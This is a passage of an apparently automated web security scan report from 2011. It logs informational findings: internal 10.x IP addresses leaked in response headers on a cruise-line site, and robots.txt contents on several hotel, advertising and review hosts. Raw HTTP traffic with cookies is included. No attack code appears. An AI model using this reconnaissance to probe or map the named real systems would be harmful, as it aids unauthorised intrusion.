<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.51. http://www2.ncl.com/freestyle-cruise/freestyle-family-fun/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/freestyle-family-fun/overview

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /freestyle-cruise/freestyle-family-fun/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 11:29:26 +0000
ETag: "1317641366-1"
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:50 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:50 GMT; path=/; domain=ncl.com
Content-Length: 46071

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.52. http://www2.ncl.com/freestyle-cruise/golf/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/golf/overview

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /freestyle-cruise/golf/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317633060-1"
Last-Modified: Mon, 03 Oct 2011 09:11:00 +0000
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:03 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:03 GMT; path=/; domain=ncl.com
Content-Length: 44665

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.53. http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/hawaii-cruise-and-hotel-packages

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /freestyle-cruise/hawaii-cruise-and-hotel-packages HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.1.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; s_pers=%20s_nr%3D1317646081809-New%7C1320238081809%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317631959-1"
Last-Modified: Mon, 03 Oct 2011 08:52:39 +0000
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Content-Length: 46432
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 12:47:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:47:41 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:47:41 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.54. http://www2.ncl.com/freestyle-cruise/nickelodeon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/nickelodeon

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /freestyle-cruise/nickelodeon HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317630718-1"
Last-Modified: Mon, 03 Oct 2011 08:31:58 +0000
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:55 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:55 GMT; path=/; domain=ncl.com
Content-Length: 43466

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.55. http://www2.ncl.com/freestyle-cruise/onboard-experience  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/onboard-experience

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /freestyle-cruise/onboard-experience HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317630975-1"
Last-Modified: Mon, 03 Oct 2011 08:36:15 +0000
X-Ncl-SLog: 10.5.44.28
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Content-Length: 48855

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.56. http://www2.ncl.com/freestyle-cruise/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/overview

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /freestyle-cruise/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317634785-1"
Last-Modified: Mon, 03 Oct 2011 09:39:45 +0000
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Content-Length: 43089

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.57. http://www2.ncl.com/freestyle-cruise/spa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/spa

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /freestyle-cruise/spa HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317640158-1"
Last-Modified: Mon, 03 Oct 2011 11:09:18 +0000
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:16 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:16 GMT; path=/; domain=ncl.com
Content-Length: 56334

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.58. http://www2.ncl.com/freestyle-cruise/spa-sports-and-fitness  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/spa-sports-and-fitness

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /freestyle-cruise/spa-sports-and-fitness HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317633921-1"
Last-Modified: Mon, 03 Oct 2011 09:25:21 +0000
X-Ncl-SLog: 10.5.44.32
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:54 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:54 GMT; path=/; domain=ncl.com
Content-Length: 41946

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.59. http://www2.ncl.com/ncl_inside_scoop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /ncl_inside_scoop

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ncl_inside_scoop HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_pers=%20s_nr%3D1317646086034-New%7C1320238086034%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.2.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317645006-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:30:06 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
X-Ncl-SLog: 10.5.44.33
Content-Length: 7543
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 13:05:04 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:04 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:04 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.60. http://www2.ncl.com/ncl_inside_scoop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /ncl_inside_scoop

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ncl_inside_scoop HTTP/1.1
Host: www2.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_pers=%20s_nr%3D1317646086034-New%7C1320238086034%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.2.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317645006-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:30:06 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
X-Ncl-SLog: 10.5.44.31
Content-Length: 7543
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 12:47:48 GMT
Connection: close
Set-Cookie: Cookie=R4252675302; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:47:48 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:47:48 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.61. http://www2.ncl.com/sitemap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /sitemap

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sitemap HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317645618-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:40:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Vary: Cookie
Date: Mon, 03 Oct 2011 13:05:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Content-Length: 59876

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
21.62. https://www2.ncl.com/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /vacations

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 13:02:52 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1317646972"
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 13:02:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R1788641230; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:02:53 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:02:53 GMT; path=/; domain=ncl.com
Content-Length: 195543

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
22. Robots.txt file  previous  next
There are 22 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

22.1. http://as00.estara.com/as/InitiateCall2.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as00.estara.com
Path:   /as/InitiateCall2.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as00.estara.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:54:08 GMT
Server: Apache
Last-Modified: Thu, 14 Jul 2011 10:17:02 GMT
Accept-Ranges: bytes
Content-Length: 541
Cache-Control: max-age=2592000
Expires: Wed, 02 Nov 2011 12:54:08 GMT
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# /robots.txt for as00.estara.com
User-agent: *
Disallow: /adds
Disallow: /Age
Disallow: /api
Disallow: /as
Disallow: /Cha
Disallow: /cmb
Disallow: /comp
Disallow: /coun
Disallow: /Data
Disallow: /Del
...[SNIP]...
22.2. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 03 Oct 2011 12:52:47 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN

User-Agent: *
Disallow: /
Noindex: /
22.3. http://g-pixel.invitemedia.com/gmatcher  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /gmatcher

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 03 Oct 2011 12:52:48 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
22.4. http://gs.instantservice.com/geoipAPI.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gs.instantservice.com
Path:   /geoipAPI.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gs.instantservice.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:56:13 GMT
Server: Apache
Last-Modified: Mon, 19 Sep 2011 23:09:41 GMT
ETag: "45da9-1a-70129740"
Accept-Ranges: bytes
Content-Length: 26
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /
22.5. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://marriottinternationa.tt.omtrdc.net
Path:   /m2/marriottinternationa/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: marriottinternationa.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Mon, 03 Oct 2011 12:55:33 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /
22.6. http://metrics.marriott.com/b/ss/marriottglobal/1/H.20.2/s41431111721321  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.marriott.com
Path:   /b/ss/marriottglobal/1/H.20.2/s41431111721321

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.marriott.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:55:43 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "335148-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www168
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
22.7. http://o.opentable.com/b/ss/otrestref/1/H.22.1/s45203784920740  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.opentable.com
Path:   /b/ss/otrestref/1/H.22.1/s45203784920740

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: o.opentable.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:40 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "361192-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www374
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
22.8. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opentable.tt.omtrdc.net
Path:   /m2/opentable/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: opentable.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Mon, 03 Oct 2011 12:54:47 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /
22.9. http://opentable.ugc.bazaarvoice.com/static/0938/r_5_ispacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opentable.ugc.bazaarvoice.com
Path:   /static/0938/r_5_ispacer.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: opentable.ugc.bazaarvoice.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=ISO-8859-1
Date: Mon, 03 Oct 2011 12:55:23 GMT
Content-Length: 132
Connection: close

User-agent: *
Disallow: /bvs
Disallow: /rev
Disallow: /log
Disallow: /logging
Disallow: /logging?*

User-agent: kalooga
Disallow: /
22.10. http://reviews.opentable.com/0938/200/reviews.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://reviews.opentable.com
Path:   /0938/200/reviews.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: reviews.opentable.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=ISO-8859-1
Date: Mon, 03 Oct 2011 12:55:12 GMT
Content-Length: 191
Connection: close

Sitemap: http://reviews.opentable.com/sitemapindex.xml.gz

User-agent: *
Disallow: /bvs
Disallow: /rev
Disallow: /log
Disallow: /logging
Disallow: /logging?*

User-agent: kalooga
Disallow: /
22.11. http://rs.instantservice.com/resources/smartbutton/7534/II3_Servers.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.instantservice.com
Path:   /resources/smartbutton/7534/II3_Servers.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rs.instantservice.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:56:13 GMT
Server: Apache
Last-Modified: Mon, 19 Sep 2011 23:10:32 GMT
ETag: "1a-731cca00"
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain; charset=iso-8859-1

User-agent: *
Disallow: /
22.12. https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.hilton.com
Path:   /en/hi/mytravelplanner/my_account.jhtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.hilton.com

Response

HTTP/1.0 200 OK
Server: Netscape-Enterprise/6.0
Content-Length: 25549
Content-Type: text/plain
ETag: "4199a553-fa78-0-63cd"
Last-Modified: Mon, 09 May 2011 22:25:00 GMT
Accept-Ranges: bytes
Cache-Control: max-age=126799
Expires: Wed, 05 Oct 2011 00:11:55 GMT
Date: Mon, 03 Oct 2011 12:58:36 GMT
Connection: close

# Daytime instructions for search engines
# Do not visit Hilton.com during the day!
User-agent: Googlebot
Disallow: /guestlocale/
Disallow: /en/hhonors/login/owner_login.jhtml
Disallow: /en/hi/groups/
...[SNIP]...
22.13. https://secure2.hilton.com/en_US/hi/reservation/book.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure2.hilton.com
Path:   /en_US/hi/reservation/book.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure2.hilton.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:57:43 GMT
Server: Apache
Last-Modified: Thu, 20 May 2010 20:35:40 GMT
ETag: "234c2-c0-848c7f00"
Accept-Ranges: bytes
Content-Length: 192
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Googlebot
Disallow: /corphsia
Disallow: /hsia
Disallow: /TextSearch

User-agent: Inktomi Slurp
Disallow: /corphsia
Disallow: /hsia
Disallow: /TextSearch

User-agent: *
Disallow: /
22.14. https://secure3.hilton.com/en_US/hi/reservation/book.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /en_US/hi/reservation/book.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure3.hilton.com

Response

